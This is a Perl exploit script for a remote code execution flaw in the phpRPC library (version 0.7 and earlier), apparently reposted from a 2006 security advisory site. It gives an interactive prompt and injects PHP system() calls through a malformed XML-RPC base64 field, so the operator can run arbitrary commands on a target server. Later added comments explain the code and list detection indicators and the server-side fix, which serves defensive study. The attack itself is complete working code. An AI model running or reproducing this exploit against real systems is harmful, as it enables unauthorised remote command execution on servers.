



2006-03-02 phpRPC Library <= 0.7 XML Data Decoding Remote Code Execution (2)
Rated as : Moderate risk
#!/usr/bin/perl
#
# phpRPC <=0.7 Remote Command Execution Exploit
#
# based on:
http://www.gulftech.org/?node=research&article_id=00105-02262006
#
# Copyright (c) 2006 cijfer <cijfer@netti!fi>
# All rights reserved.
#
# never ctrl+c again.
# cijfer$ http://target.com/dir
# host changed to 'http://target.com/dir'
# cijfer$ 
#
# $Id: cijfer-prpcxpl.pl,v 0.1 2006/03/01 05:46:00 cijfer Exp $

use LWP::UserAgent;
use URI::Escape;
use Getopt::Long;
use Term::ANSIColor;

# Command-line handling: --host (required), --proxy and a repeatable
# --verbose are stored in package globals that are read later in the script.
$res = GetOptions(
	"host=s"   => \$host,
	"proxy=s"  => \$proxy,
	"verbose+" => \$verbose,
);

# No target given: show the help text (usage() exits).
$host or usage();

# Interactive prompt. Each line read from STDIN is either a new target URL
# (anything starting with http://) or a command handed to exploit() together
# with the current $host. An empty line, a bare "0" or end of input ends the
# script, because all of these are false in Perl.
while (1)
{
	print color("green"), "cijfer\$ ", color("reset");
	chomp($command = <STDIN>);
	$command or exit;

	unless ($command =~ m{^http://(.*)}g)
	{
		# Ordinary input: pass it on with the currently selected host.
		exploit($command, $host);
		next;
	}

	# Input looked like a URL: switch targets, nothing is sent.
	$host = "http://$1";
	print "host changed to '", color("bold"), $host . "'\n", color("reset");
}

# Print the help text (script name taken from $0) and terminate the script.
# Two of the literals contain a line break exactly as printed on the page;
# they are kept unchanged so the output stays the same.
sub usage
{
	my @help = (
		"phpRPC <=0.7 Remote Command Execution Exploit\n",
		"usage: $0 -hpv\n\n",
		"  -h, --host\t\tfull address of target (ex.
http://www.website.com/dir)\n",
		"  -p, --proxy\t\tprovide an HTTP proxy (ex.
0.0.0.0:8080)\n",
		"  -v, --verbose\t\tverbose mode (debug)\n\n",
	);

	print @help;
	exit;
}

# exploit($command, $host)
#
# Sends one HTTP POST to $host/modules/phpRPC/server.php and prints the part
# of the reply that lies between two "_cijfer_" markers. The body is an
# XML-RPC <methodCall> whose <base64> value is not base64 at all: it opens
# with '));  and then carries PHP source (marker echo, system() on the
# operator's input, marker echo, exit()). Presumably the server places the
# decoded value inside code it evaluates -- see the advisory referenced in
# the file header; the server side is not visible here.
#
# Reads the package globals $proxy and $verbose set by GetOptions.
# Has no meaningful return value.
#
# Defensive notes, all taken from the literals below:
#   * Request indicators: POST to /modules/phpRPC/server.php with
#     Content-Type text/xml, a <base64> element containing characters
#     outside the base64 alphabet (quotes, parentheses, semicolons), the
#     marker string "_cijfer_", and the fixed User-Agent value.
#   * The document is not well-formed (<methodName>, <value> and <base64>
#     are never closed), so a strict XML well-formedness check in front of
#     the endpoint would reject it.
#   * Response indicator: the marker string "_cijfer_" in the reply body.
#   * Root fix is on the server: the header names phpRPC <= 0.7 as affected;
#     decoded request data must never reach a PHP evaluation context.
sub exploit
{
	my($command,$host) = @_;

	# A new user agent object is built for every command.
	$cij=LWP::UserAgent->new() or die;
	# Static browser-like User-Agent. NOTE(review): as printed, the literal
	# spans two lines and so contains a line break -- probably a wrapping
	# artifact of the page.
	$cij->agent("Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:2.0)
Gecko/20060101");
	# Double negative: the proxy is configured only when --proxy was given.
	$cij->proxy("http",
"http://".$proxy."/") unless !$proxy;

	# The list assignment above copied @_ without consuming it, so shift
	# returns the first argument again: $string holds the same text as $command.
	$string  = shift;
	$xml     = "<?xml version=\"1.0\"?>";
	$xml    .= "<methodCall>";
	# <methodName> is opened but never closed.
	$xml    .= "<methodName>cijfer";
	$xml    .= "    <params>";
	$xml    .= "	    <param>";
	# The operator's text is concatenated verbatim, with no encoding, into
	# the <base64> value; <value> and <base64> are left unclosed. The \n
	# after the first marker is expanded by Perl before the request is sent.
	$xml    .= "	   
<value><base64>'));echo\"_cijfer_\n\";system('".$string."');echo\"_cijfer_\";exit();";
	$xml    .= "	    </param>";
	$xml    .= "    </params>";
	$xml    .= "</methodCall>";

	# Indirect object syntax for HTTP::Request->new('POST', URL). The path
	# is fixed; only the $host prefix varies.
	$req=new HTTP::Request
'POST'=>$host."/modules/phpRPC/server.php";
	$req->content_type("text/xml");
	$req->content($xml);
	$out=$cij->request($req);

	# Only 2xx replies are processed; any other status is silently ignored.
	if($out->is_success)
	{
		# Element 1 is the text after the first marker (up to the second one,
		# if present). @cij[1] is a one-element slice where $cij[1] was meant;
		# substr(..., 1) drops the first character, which is the newline
		# echoed right after the first marker.
		@cij=split("_cijfer_",$out->content);
		print substr(@cij[1],1);
	}

	if($verbose)
	{
		# "received" is the length of the whole response body, markers included.
		$recv=length $out->content;
		print "Total received bytes: ".$recv."\n";
		# "sent" is only the length of the typed command, not of the request.
		$sent=length $command;
		print "Total sent bytes: ".$sent."\n";
	}
}

securitydot.net - 2006-03-02
